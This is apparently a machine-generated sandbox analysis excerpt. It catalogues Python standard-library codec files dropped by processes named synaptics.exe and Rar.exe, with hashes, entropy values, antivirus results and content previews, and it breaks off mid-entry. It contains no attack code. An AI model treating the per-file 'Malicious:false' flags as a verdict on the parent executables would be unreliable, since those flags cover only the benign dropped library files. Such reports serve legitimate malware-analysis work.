                                                                                                                                                                                      SHA-256:93CFD89699B7F800D6CCFB93266DA4DB6298BD73887956148D1345D5CA6742A9
                                                                                                                                                                                      SHA-512:C883B506AACD94863A0DD8C890CBF7D6B1E493D1A9AF9CDF912C047B1CA98691CFD910887961DD94825841B0FE9DADD3AB4E7866E26E10BFBBAE1A2714A8F983
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Standard "encodings" Package.... Standard Python encoding modules are stored in this package.. directory..... Codec modules must have names corresponding to normalized encoding.. names as defined in the normalize_encoding() function below, e.g... 'utf-8' must be implemented by the module 'utf_8.py'..... Each codec module must export the following interface:.... * getregentry() -> codecs.CodecInfo object.. The getregentry() API must return a CodecInfo object with encoder, decoder,.. incrementalencoder, incrementaldecoder, streamwriter and streamreader.. attributes which adhere to the Python Codec Interface Standard..... In addition, a module may optionally also define the following.. APIs which are then used by the package's codec search function:.... * getaliases() -> sequence of encoding name strings to use as aliases.... Alias names returned by getaliases() must be normalized encoding.. names as defined by normalize_encoding().....Writ
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3888
                                                                                                                                                                                      Entropy (8bit):5.534506190864174
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:wXLHIYGspF3e06Q0YhQWUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:wXEYLpFkYdU7XYLf5c6+X1Y
                                                                                                                                                                                      MD5:1A186BC10C01FAF6825CA07A96E3E7A7
                                                                                                                                                                                      SHA1:3E81CDAEB81858414AE4AFAC4387F7721E1B2D1C
                                                                                                                                                                                      SHA-256:36C384913E1E09897391ED541A899625F7B4951FC90513D97C2F5AA329157616
                                                                                                                                                                                      SHA-512:E5809F9B2FA4E840ABE1DB325DBC9BB4FC44EA35545B500BD07FB1C76AF7AFA9526DB4293700BB30D9C03DA2BCA64589A3B5346ABCBBE25CD8883243A41BB3E2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10934
                                                                                                                                                                                      Entropy (8bit):5.843026063729711
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:wX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iMzxOkq4bpehh3qkyR0N:wXG0bueBI6Kzx9IX6Ri
                                                                                                                                                                                      MD5:5E0E02E233EA63060C8FE1A49C31631A
                                                                                                                                                                                      SHA1:C42CBFA519A9972D9B6BD55E619A2CB5FFF52F39
                                                                                                                                                                                      SHA-256:28A7A2B8753AD080BDFE42B3E8189D2B82C76FCE9A4340D7B5C416DD1EFF4A1A
                                                                                                                                                                                      SHA-512:612586779C1F26D357CBB954A3E6DB042C0AD9B30BCD1ECAED5BC19C99F6EBAD5FB7552D7DDE62B4F847DFDF716D55E767625DCE5D337F261AB8333163AB75A1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2390
                                                                                                                                                                                      Entropy (8bit):5.439156864509416
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:G8HYqr1E/GxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:G8HY0E/WtZjr+Jldf33Pf396nz
                                                                                                                                                                                      MD5:22050533B9C41ED4D89831676F2650B0
                                                                                                                                                                                      SHA1:FDD04FB38CFAED5D7C03D9AC7C2B6F79270F0971
                                                                                                                                                                                      SHA-256:F9A78908C2C8F0EB0A4DC9803302B1E5E788DDD2EC0B0E57DC6D17AD395CEF1A
                                                                                                                                                                                      SHA-512:45F944503B62ED9F2E7EB336F7079705A4D74894786F4C247D8E8FB12D38CCA2E7F4643AEA513A6BB15B6DEE2FDFC80EE8D3DD9CE936BE2686888EBA841341F2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....4C:\Users\Public\QExvbmVOb25l\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......finalr....r...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5612
                                                                                                                                                                                      Entropy (8bit):5.23209220359469
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:iD57oZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:yFoZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                      MD5:E58F35B31D091F164FC43E8A0590E147
                                                                                                                                                                                      SHA1:BC2C92C56EF3D67A6EC75329908E0D44D5025CBF
                                                                                                                                                                                      SHA-256:E9A7E5E7DB2B77BFABCA02E91B27680E8AB036E43F5E4532C52FDA57BEF3A9F2
                                                                                                                                                                                      SHA-512:77060C717206932FCA3B6C65DCA0EBD55E96E21FD73DFD7F1EFABB9CDC27E3CB45E08A9264250D049B1783B59F7A382CF50A5B9B07D0C3EC4D480C54FA47E456
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.$.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.S.)......N)...ucd_3_2_0u....[....]s....xn--z.xn--c....................C...s....g.}.|.D.].}.t...|...r.q.|...t...|.......q.d...|...}.t...d.|...}.|.D.]5}.t...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...sQt...|...rWt.d.|.......q"d.d...|.D...}.t.|...r|t.d.d...|.D.....rpt.d.....|.d...rx|.d...s|t.d.....|.S.).N....NFKCz.Invalid character %rc....................S...s....g.|.].}.t...|.....q.S...)...stringprepZ.in_table_d1.....0..xr....r.....2C:\Users\Public\QExvbmVOb25l\lib\encodings\idna.py..<listcomp>)...s......z.nameprep.<locals>.<listcomp>c....................s...s......|.].}.t...|...V...q.d.S.).N).r....Z.in_table_d2r....r....r....r......<genexpr>1...s........z.nameprep.<locals>.<genexpr>z.Violation of BIDI requirement 2r.........z.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1610
                                                                                                                                                                                      Entropy (8bit):4.728935998507901
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ZVtus1pipMHUrYPyaGcLXaLOsJkLBBn1U:ZbuWNHUPNcLXaasmP1U
                                                                                                                                                                                      MD5:990F153518B6D6BDF0A0AE65C50B7941
                                                                                                                                                                                      SHA1:E228547F05E8315281C4210E4A4A033393DF265B
                                                                                                                                                                                      SHA-256:51A265B412E42E30C7ABBAE878E567275610553B2FDD19705D709F86263760DA
                                                                                                                                                                                      SHA-512:B2CF8CA74F847624EAED77C4419E63FB6529AA3F3BFA05937CE0E1205F55821AD16473684488FE70B87ABF2BBD5DC7C53DF7ACB9463EB73975468A78F0CB88E7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sp...d.Z.d.d.l.Z.e.j.Z.d.d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.d...Z.d.S.).z. Python 'utf-8' Codec...Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N..strictc....................C...s....t...|.|.d...S.).NT)...codecs..utf_8_decode)...input..errors..r.....3C:\Users\Public\QExvbmVOb25l\lib\encodings\utf_8.py..decode....s......r....c....................@...s....e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C...s....t...|.|.j...d...S.).Nr....).r......utf_8_encoder....)...selfr......finalr....r....r......encode....s......z.IncrementalEncoder.encodeN).F)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....c....................@........e.Z.d.Z.e.j.Z.d.S.)...IncrementalDecoderN).r....r....r....r....r......_buffer_decoder....r....r....r....r.................r....c....................@...r....)...Str
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16228
                                                                                                                                                                                      Entropy (8bit):4.043924236672622
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ojm3001RTSvqNLtEBLKSyhNM4Bu7fbROCVLD6S+:oMReiNLtEB+Syhi4Bu7zHVLud
                                                                                                                                                                                      MD5:FF23F6BB45E7B769787B0619B27BC245
                                                                                                                                                                                      SHA1:60172E8C464711CF890BC8A4FECCFF35AA3DE17A
                                                                                                                                                                                      SHA-256:1893CFB597BC5EAFD38EF03AC85D8874620112514EB42660408811929CC0D6F8
                                                                                                                                                                                      SHA-512:EA6B685A859EF2FCD47B8473F43037341049B8BA3EEA01D763E2304A2C2ADDDB01008B58C14B4274D9AF8A07F686CD337DE25AFEB9A252A426D85D3B7D661EF9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Encoding Aliases Support.... This module is used by the encodings package search function to.. map encodings names to module names..... Note that the search function normalizes the encoding names before.. doing the lookup, so the mapping will have to map normalized.. encoding names to module names..... Contents:.... The following aliases dictionary contains mappings of all IANA.. character set names for which the Python core library provides.. codecs. In addition to these, a few Python specific codec.. aliases have also been added....."""..aliases = {.... # Please keep this list sorted alphabetically by value !.... # ascii codec.. '646' : 'ascii',.. 'ansi_x3.4_1968' : 'ascii',.. 'ansi_x3_4_1968' : 'ascii', # some email headers use this non-standard name.. 'ansi_x3.4_1986' : 'ascii',.. 'cp367' : 'ascii',.. 'csascii' : 'ascii',.. 'ibm367' : 'ascii',.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1298
                                                                                                                                                                                      Entropy (8bit):4.6538766905589
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JASEHV0yWoyWFmSMufQRhQFmBUQWSJzWSJDtyWFmtyWz9ZKj951QJxlTpf:JASdue6SJ6SJ8TKxQJxHf
                                                                                                                                                                                      MD5:FF48C6334861799D8D554F5D2A30BA00
                                                                                                                                                                                      SHA1:08520B19D0353712CDFD919B3694945678C3D2D7
                                                                                                                                                                                      SHA-256:698C578B9B5DF7BD6F8B2761D114F74CFF854C1396083C8AB912B11FCAE83B86
                                                                                                                                                                                      SHA-512:087A0E1BA9D9CA2C2F51F0156AD0ADA1D1EB7CCBA8B46159B95779B053D2431FC52BA1CA57FEC381EA044A7F0E41490B5389B1AF2DBF513C35CC1B29997FEE6E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'ascii' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.ascii_encode.. decode = codecs.ascii_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.ascii_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.ascii_decode(input, self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.ascii_decode.. decode = codecs.ascii_encode....### encodings module API....def getreg
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1588
                                                                                                                                                                                      Entropy (8bit):4.646022236658084
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:XDpo1AIxDc1AIxj1i1uuMP9vIvPTKqPJxHjH:XVo/xDc/xjoMu2A3TK0rH
                                                                                                                                                                                      MD5:46F8E67E43DAC28160F47E3870B39365
                                                                                                                                                                                      SHA1:0B1A69175889E5D4603C616EBD6E7EC456C6ABCB
                                                                                                                                                                                      SHA-256:AC4443CEB3E045F064335AED4C9C2143F1C256DDD25AAA5A9DB4B5EE1BCCF694
                                                                                                                                                                                      SHA-512:CFEA01544E998CAED550B37B61439014D0BA6D707068F1D7E4726A6AC8F4B8B81C2E7ED3A5DFB76687D1FDBCD7EC2DC6C5047D8061ECCBC8A59A4587FCBED253
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python 'base64_codec' Codec - base64 content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import base64....### Codec APIs....def base64_encode(input, errors='strict'):.. assert errors == 'strict'.. return (base64.encodebytes(input), len(input))....def base64_decode(input, errors='strict'):.. assert errors == 'strict'.. return (base64.decodebytes(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return base64_encode(input, errors).. def decode(self, input, errors='strict'):.. return base64_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return base64.encodebytes(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1058
                                                                                                                                                                                      Entropy (8bit):4.522034261788674
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nUqj2Oz6f/XoBKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9sAcJxFplR:UqvLV62VJjRU8njOxLnrxLbrLKaJxTz
                                                                                                                                                                                      MD5:9AE0A356995140BFF35627C45E7DA1B8
                                                                                                                                                                                      SHA1:7A23003577D29B3470BEE6EE996EAA2EA120FDD3
                                                                                                                                                                                      SHA-256:CADB1C66D355F551E4D99A895725B62211CC5CBDE1F037C61FD4463932FF70CB
                                                                                                                                                                                      SHA-512:F8764CFB30BD5EE67B527DC0FF5E70E41F03D617EF3AB0A3DE021825B751105373A251919E00A9F5C4F581471B393565A51C3B09B4CD1BD11BD8EBBA37545B42
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# big5.py: Python Unicode Codec for BIG5..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_tw, codecs..import _multibytecodec as mbc....codec = _codecs_tw.getcodec('big5')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='big5',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1078
                                                                                                                                                                                      Entropy (8bit):4.563261678208351
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nCqjMOzCf/XophKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9s2cJxFpz:CqZjp162VJjRU8njOxLnrxLbrLKKJxTz
                                                                                                                                                                                      MD5:DB9A713E27FB20F00437D9DAB32C1FAC
                                                                                                                                                                                      SHA1:E7E0DAF3371FDC04C5DA6DFB0F9D1B93BC44620F
                                                                                                                                                                                      SHA-256:7FCF88553A656ABE5E4DC1A8E89D1E279DDEC83DE79E22F971AC04E7632708E9
                                                                                                                                                                                      SHA-512:AAA035F5C5930233004855D9876B87D95FFAA5B8CE21F62FB499966BB8F29B5A5F4BF501FAC5013F5E8CA8F9D1DE8A0F1A288E346A87EF52BA2AF43AEB56E500
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# big5hkscs.py: Python Unicode Codec for BIG5HKSCS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_hk, codecs..import _multibytecodec as mbc....codec = _codecs_hk.getcodec('big5hkscs')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='big5hkscs',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2327
                                                                                                                                                                                      Entropy (8bit):4.640437967116185
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:XT1NsDZd91AIFjz1AIo31951TuY51w6P7z0/51wz2xth+yvIvPTK2yJxHjH:XxeDZX/Fjz/o3JNuY5H7zq53thA3TKvD
                                                                                                                                                                                      MD5:1AA105E7EED39A1B52B24B524B541AB0
                                                                                                                                                                                      SHA1:9DE4EB2157EF2D0339EB565B0BD2AD6DBA1172B3
                                                                                                                                                                                      SHA-256:A0A34436976BB5137403C148CB8B332653F14CAA6CDF102150E82646D5249A5E
                                                                                                                                                                                      SHA-512:CDA0CDAA96ECC52F5D57C9CA9D118B90D2E93630D47ED9CB99E0BA07A40D03470872676CB00B7DEE70089045E9AAB3BF37AF09DF075B7C5212947C9A17F66979
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python 'bz2_codec' Codec - bz2 compression encoding.....This codec de/encodes from bytes to bytes and is therefore usable with..bytes.transform() and bytes.untransform().....Adapted by Raymond Hettinger from zlib_codec.py which was written..by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import bz2 # this codec needs the optional bz2 module !....### Codec APIs....def bz2_encode(input, errors='strict'):.. assert errors == 'strict'.. return (bz2.compress(input), len(input))....def bz2_decode(input, errors='strict'):.. assert errors == 'strict'.. return (bz2.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return bz2_encode(input, errors).. def decode(self, input, errors='strict'):.. return bz2_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2153
                                                                                                                                                                                      Entropy (8bit):4.704086253537808
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ad1E6SbuY5qRl45qrO6SA13MNOg106SA13MNOo1tRTKyQJxHf:adKlbuY5qRl45qrOW13Mkg2y13MooDRm
                                                                                                                                                                                      MD5:8A14214EF1C47A40C56C08A793FC9923
                                                                                                                                                                                      SHA1:73205DCA66A87C26464472C25D39795BFFF46F88
                                                                                                                                                                                      SHA-256:1EA641E7C63C0A022A663F5D2024A71124272E088C246583D2D44CDDDF548A32
                                                                                                                                                                                      SHA-512:D7E94201E8168043BE5BD6D1CE5B0720E653EC84A7ABBEAB6F99781228435C590D75B1FE3AE58B700287E6AABC7A44DA4059561F22317B7A529263E1AD2A3C8F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Generic Python Character Mapping Codec..... Use this codec directly rather than through the automatic.. conversion mechanisms supplied by unicode() and .encode().......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.charmap_encode.. decode = codecs.charmap_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict', mapping=None):.. codecs.IncrementalEncoder.__init__(self, errors).. self.mapping = mapping.... def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, self.mapping)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def __init__(self, errors='strict', mapping=None):.. c
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13428
                                                                                                                                                                                      Entropy (8bit):4.523742655695844
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:HHhsuOTDvR6UZkPS9BC4KNVFIhRNvcE8bV2H2QB:KT7C4PRcE8bgWQB
                                                                                                                                                                                      MD5:A28DE4284DFAEFEC5CF40EE279C388F3
                                                                                                                                                                                      SHA1:5EEF5925AC2C77227A03067E17808B5F10C41018
                                                                                                                                                                                      SHA-256:FA3FF4B328C72315EC622CD62FEAC21189A3C85BCC675552D0EC46677F16A42C
                                                                                                                                                                                      SHA-512:8FD7FD3C0A099A5851E9A06B10D6B44F29D4620426A04AE008EB484642C99440571D1C2C52966D972C2C91681EBD1C9BF524B99582D48E707719D118F4CD004A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp037 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP037.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp037',.. e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13875
                                                                                                                                                                                      Entropy (8bit):4.677799937409236
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0HhsuOTDvRbUrXPLouhIAs2+ijL5YvwKpVMY4Uq:RTZuhIAlr4C
                                                                                                                                                                                      MD5:8E2D801694A19B3A569F383708A5F7CB
                                                                                                                                                                                      SHA1:B1803CF5FF75A77BDA42CED7C15E74861273B713
                                                                                                                                                                                      SHA-256:1FDCD59D3277C3768DE74DD8CE4F5F8BEEA569C00CBAA3A20714500F3508B8CB
